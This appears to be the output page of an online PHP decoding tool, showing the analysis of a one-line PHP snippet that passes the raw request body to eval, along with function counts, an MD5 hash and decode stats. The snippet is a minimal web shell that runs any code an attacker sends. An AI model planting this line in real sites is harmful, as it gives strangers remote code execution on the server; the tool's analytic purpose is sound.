Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(file_get_contents('php://input')); ?> ..

Decoded Output download

<?php 
	eval(file_get_contents('php://input')); 
?> 

Did this file decode correctly?

Original Code

<?php
	eval(file_get_contents('php://input'));
?>

Function Calls

file_get_contents 1

Variables

None

Stats

MD5 22f6b37104991040a3b8ab1e32e2ca08
Eval Count 1
Decode Time 78 ms